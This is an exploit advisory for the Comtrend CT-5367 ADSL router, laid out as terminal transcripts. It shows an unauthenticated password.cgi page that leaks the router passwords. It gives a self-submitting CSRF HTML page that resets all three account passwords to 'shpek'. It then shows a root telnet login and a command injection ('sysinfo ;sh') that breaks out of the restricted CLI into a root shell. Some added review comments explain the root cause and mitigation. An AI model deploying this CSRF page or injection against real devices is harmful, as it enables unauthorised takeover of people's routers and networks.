/*COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12  Remote Root
=============================================================================
Board ID	: 96338A-122
Software	: A111-312BTC-C01_R12
Bootloader	: 1.0.37-12.1-1
Wireless Driver	: 4.170.16.0.cpe2.1sd
ADSL		: A2pB023k.d20k_rc2

=============================================================================
Type		: Hardware
Risk		: High
Attack vector	: Remote
Discovered by	: Todor Donev
Author Email	: todor.donev@gmail.com

=============================================================================
Special greetz to my sweetheart friend and my lil' secret Tsvetelina Emirska,
and all my other friends that support me a lot of times for everything !!

*/

root@linux:~#  get.pl http://192.168.1.1/

/*HTTP/1.1 401 Unauthorized
Cache-Control: no-cache
Connection: close
Date: Sat, 01 Jan 2000 00:04:31 GMT
Server: micro_httpd                        ## Yeah !! Bite me :(
WWW-Authenticate: Basic realm="DSL Router"
Content-Type: text/html

<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
Authorization required.
<HR>
<ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS>
</BODY></HTML>
*/

root@linux:~#  get.pl http://192.168.1.1/password.cgi   ## Information disclosure: answered with 200 and no credentials, unlike the 401 for / above

/*HTTP/1.1 200 Ok
Cache-Control: no-cache
Connection: close
Date: Mon, 03 Jan 2000 23:01:25 GMT
Server: micro_httpd
Content-Type: text/html

<html>
   <head>
      <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
      <link rel="stylesheet" href='stylemain.css' type='text/css'>
         <link rel="stylesheet" href='colors.css' type='text/css'>
            <script language="javascript" src="util.js"></script>
            <script language="javascript">
<!-- hide\n                               ## Dammit! =))
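pwdAdmin = '<CENSORED>';                  ## Admin password returned in the page's JavaScript (censored here)
pwdSupport = '<CENSORED>';                ## Support password returned in the page's JavaScript (censored here)
pwdUser = '<CENSORED>';\n                 ## User password returned in the page's JavaScript (censored here)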
*/



[CUT EXPLOIT HERE]                        ## CSRF that changes all three account passwords
<!-- Proof-of-concept page from the advisory: a form that submits itself on load
     (the onLoad handler on <body>) and POSTs three password fields to
     password.cgi on the router's LAN address. -->
<html>
<head></head>
<title>COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Change All passwords</title>
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.1.1/password.cgi"; method="POST" name="form">
<!-- Change default system Passwords to "shpek" without authentication and verification -->
<!-- NOTE(review): the form carries only the three new-password fields: no
     current password and no anti-CSRF token. The transcript earlier on this
     page shows password.cgi answering 200 without credentials, which is the
     root cause. The fix belongs in the firmware: password.cgi should require
     an authenticated session, the old password and a per-request token.
     Until a fixed firmware is available, limit who can reach the management
     interface. -->
<input type="hidden" name="sptPassword" value="shpek">
<input type="hidden" name="usrPassword" value="shpek">
<input type="hidden" name="sysPassword" value="shpek">
</form>
</body>
</html>
[CUT EXPLOIT HERE]


root@linux:~# telnet 192.168.1.1

ADSL Router Model CT-5367 Sw.Ver. C01_R12
Login: root
Password:
## BINGOO !! Godlike =))
> ?

?
help
logout
reboot
adsl
atm
ddns
dumpcfg
ping
siproxd
sntp
sysinfo
tftp
wlan
version
build
ipfilter

> sysinfo
Number of processes: 30
 11:46pm  up 2 days, 23:46,
load average: 1 min:0.12, 5 min:0.05, 15 min:0.09
              total         used         free       shared      buffers
  Mem:        14012        13028          984            0          588
 Swap:            0            0            0
Total:        14012        13028          984

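> sysinfo ;sh                               ## JAILBREAK !! FirmWare sucks  :)  The restricted CLI hands the whole line to `sh -c` unfiltered (see `sh -c sysinfo ;sh` in the ps output below)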
Number of processes: 30
 11:47pm  up 2 days, 23:47,
load average: 1 min:0.07, 5 min:0.05, 15 min:0.08
              total         used         free       shared      buffers
  Mem:        14012        13024          988            0          588
 Swap:            0            0            0
Total:        14012        13024          988


BusyBox v1.00 (2009.12.08-09:42+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# cat /proc/version
Linux version 2.6.8.1 (wander@localhost.localdomain) (gcc version 3.4.2) #1 Tue Dec 8 17:40:39 CST 2009

# ps
  PID  Uid     VmSize Stat Command
    1 root        280 S   init
    2 root            SWN [ksoftirqd/0]
    3 root            SW< [events/0]
    4 root            SW< [khelper]
    5 root            SW< [kblockd/0]
   15 root            SW  [pdflush]
   16 root            SW  [pdflush]
   17 root            SW  [kswapd0]
   18 root            SW< [aio/0]
   23 root            SW  [mtdblockd]
   32 root        328 S   -sh
   65 root       1384 S   cfm
   72 root            SW  [bcmsw]
  192 root        216 S   pvc2684d
  275 root        496 S   nas -P /var/wl0nas.lan0.pid -H 34954 -l br0 -i wl0 -A
  342 root        304 S   dhcpd
  596 root       1384 S   CT_Polling
  600 root        432 S   pppd -c 0.0.35.1 -i nas_0_0_35 -u <CENSORED> -p
  931 root        248 S   dhcpc -i nas_0_0_40
  993 root        316 S   dproxy -D btc-adsl
  997 root        352 S   upnp -L br0 -W ppp_0_0_35_1 -D
 1013 root        512 S   siproxd --config /var/siproxd/siproxd.conf
 1014 root        512 S   siproxd --config /var/siproxd/siproxd.conf
 1015 root        512 S   siproxd --config /var/siproxd/siproxd.conf
10745 root        292 S   syslogd -C -l 7
10747 root        256 S   klogd
 6616 root       1396 S   telnetd
 6618 root       1428 S   telnetd
 6673 root        284 S   sh -c sysinfo ;sh
 6724 root        284 R   ps

# top
Mem: 13164K used, 848K free, 0K shrd, 588K buff, 5920K cached
Load average: 0.00, 0.02, 0.07    (State: S=sleeping R=running, W=waiting)

  PID USER     STATUS   RSS  PPID %CPU %MEM COMMAND
 6751 root     R        288  6675  0.7  2.0 exe
    2 root     SWN        0     1  0.3  0.0 ksoftirqd/0
 6616 root     S       1396    65  0.1  9.9 telnetd
  931 root     S        248     1  0.1  1.7 dhcpc
 6618 root     S       1428  6616  0.0 10.1 telnetd
   65 root     S       1384    32  0.0  9.8 cfm
  596 root     S       1384    65  0.0  9.8 CT_Polling
 1013 root     S        512     1  0.0  3.6 siproxd
 1014 root     S        512  1013  0.0  3.6 siproxd
 1015 root     S        512  1014  0.0  3.6 siproxd
  275 root     S        496     1  0.0  3.5 nas
  600 root     S        432     1  0.0  3.0 pppd
  997 root     S        352     1  0.0  2.5 upnp
   32 root     S        328     1  0.0  2.3 sh
  993 root     S        316     1  0.0  2.2 dproxy
 6675 root     S        316  6673  0.0  2.2 exe
  342 root     S        304     1  0.0  2.1 dhcpd
10745 root     S        292     1  0.0  2.0 exe
 6673 root     S        284  6618  0.0  2.0 sh
    1 root     S        280     0  0.0  1.9 init
# echo *                                               ## ls o.O?!?                                         
bin dev etc lib linuxrc mnt proc sbin usr var webs
#